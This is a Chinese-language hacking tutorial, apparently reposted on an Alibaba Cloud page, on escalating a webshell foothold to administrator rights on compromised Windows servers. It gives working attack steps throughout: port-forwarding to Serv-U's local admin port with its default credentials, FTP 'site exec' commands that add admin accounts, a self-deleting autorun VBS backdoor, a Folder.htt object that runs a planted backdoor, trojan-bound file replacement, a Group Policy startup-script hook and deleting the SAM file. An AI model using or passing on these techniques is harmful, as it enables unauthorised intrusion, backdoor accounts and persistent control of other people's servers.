WEBSHELL許可權提升 小輝無聊了;9

來源:互聯網
上載者:User

動網上傳漏洞,相信大家拿下不少肉雞吧,但是都是WEBSHELL,不能拿到系統許可權,要如何拿到系統許可權呢?這正是我們這次要討論的內容

OK,進入我的WEBSHELL             

啊哈,不錯,雙CPU,速度應該跟的上,不拿下你我怎麼甘心啊

輸入密碼,進入到裡面看看,有什麼好東西沒有,翻了下,好像也沒有什麼特別的東西,看看能不能進到其他的盤符,點了下C盤,不錯不錯,可以進去,這樣提升就大有希望了

一 serv-u提升

OK,看看他的PROGRAME裡面有些什麼程式,哦,有SERV-U,記得有次看到SERV-U有預設的使用者名稱和密碼,但是監聽的連接埠是43958,而且是只有本地才能訪問的,但是我們有連接埠轉寄工具的啊,不怕。先看看他的SERV-U的版本是多少,telnet XXX.XXX.XXX.XXX 21

顯示竟然是3.0的,唉,不得不說這個管理員真的不稱職。後來完畢後掃描了下,也只有FTP的洞沒有補。既然是這樣,我們就開始我們的提升許可權了

上傳FPIPE,連接埠轉寄工具, 圖三

在運行CMD命令裡輸入d:\wwwroot\fpipe.exe -v -l 81 -r 43958 127.0.0.1 意思是把原生43598連接埠轉寄到81連接埠

然後開啟我們自己機子上的SERV-U,點Serv-U伺服器,點功能表列上的的伺服器,點建立伺服器,然後輸入IP,輸入連接埠,記得連接埠是剛剛我們轉寄的81連接埠。服務名稱隨便你喜歡,怎麼樣都行。然後是使用者名稱:LocalAdministrator  密碼:#l@$ak#.lk;0@P   (密碼都是字母)

確定,然後點剛剛建的伺服器,然後就可以看到已有的使用者,自己建立一個使用者,把所有許可權加上。也不鎖定根目錄

接下來就是登陸了,登陸FTP一定要在CMD下登陸,

進入後一般命令和DOS一樣,添加使用者的時候

ftp>quote site exec net.exe user hk pass /add

ftp>quote site exec net.exe localgroup administrators hk/add

如果對方開了3389的話,就不用我教你怎麼做了,沒開的話,建立立IPC串連,在上傳木馬或者是開啟3389的工具



auto.ini 加 SHELL.VBS

autorun.inf

[autorun]

open=shell.vbs

shell.vbs

dim wsh 

set wsh=CreateObject("WScript.Shell")

wsh.run "net user guest /active:yes",0

wsh.run "net user guest 520ls",0

wsh.run "net localgroup administrators guest /add",0

wsh.run "net user hkbme 520ls /add",0

wsh.run "net localgroup administrators hkbme /add",0

wsh.run "cmd.exe /c del autorun.inf",0

wsh.run "cmd.exe /c del shell.vbs",0

但是這樣要可以訪問到對方的根目錄。將這兩個檔案放到對方硬碟的根目錄下。當然你也可以直接執行木馬程式,還要一個木馬程式,但是語句就和最後兩句一樣,通過CMD執行木馬程式



Folder.htt與desktop.ini

將改寫的Folder.htt與desktop.ini,還有你的木馬或者是VBS或者是什麼,放到對方管理員最可能瀏覽的目錄下,覺得一個不夠,可以多放幾個

Folder.htt添加代碼

<OBJECT ID=”RUNIT” WIDTH=0 HEIGHT=0 TYPE=”application/x-oleobject” CODEBASE=”你的後門檔案名稱”>

</OBJECT>

但是後門和這兩個檔案必須要放到一塊,有點問題,可以結合啟動VBS,運行結束後,刪除上傳的後門.就是CODEBASE="shell.vbs".shell寫法如上



replace

替換法,可以替換正在執行的檔案。用這個幾乎可以馬上得到許可權,但是我沒有做過實驗,可以試下,將對方正在執行的檔案替換為和它檔案名稱一樣的,捆綁了木馬的。為什麼不直接替換木馬呢?如果替換的是關鍵程式,那不是就直接掛了?所以還是捆綁好點

格式

REPLACE [drive1:][path1]filename [drive2:][path2] [/A] [/P] [/R] [/W]

REPLACE [drive1:][path1]filename [drive2:][path2] [/P] [/R] [/S] [/W]

 [drive1:][path1]filename 指定源檔案。

 [drive2:][path2] 指定要替換檔案的

              目錄。

 /A 把新檔案加入目標目錄。不能和

              /S 或 /U 命令列開關搭配使用。

 /P 替換檔案或加入源檔案之前會先提示您

              進行確認。

 /R 替換隻讀檔案以及未受保護的

              檔案。

 /S 替換目標目錄中所有子目錄的檔案。

              不能與 /A 命令選項

              搭配使用。

 /W 等您插入磁碟以後再運行。

 /U 只會替換或更新比源檔案日期早的檔案。

              不能與 /A 命令列開關搭配使用

這個命令沒有實驗過,看能不能替換不能訪問的檔案夾下的檔案,大家可以實驗下



指令碼

編寫一個啟動/關機指令碼設定檔scripts.ini,這個檔案名稱是固定的,不能改變。內容如下:

[Startup]

0CmdLine=a.bat

0Parameters=

將檔案scripts.ini儲存到“C:\winnt\system32\GroupPolicy\Machine\Scripts”

A.BAT的內容可以是NET USER yonghu mima

也可以是NET USER ADMINistrator  XXX

這樣可以恢複你想要得任意使用者名稱的密碼,也可以自己增加新的使用者,但是要依賴重啟,還有就是對SYSTEM32有寫的許可權



SAM

如果可以訪問對方的SYSTEM32的話,刪除對方的SAM檔案,等他重啟以後就是ADMIN使用者密碼為空白

突然又有了想法,可以用REPLACE命令替換的嗎,可以把你的SAM檔案提取出來,上傳到他的任意目錄下,然後替換。不過不知道如果對SYSTEM32沒有許可權訪問的話,能不能實現替換

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.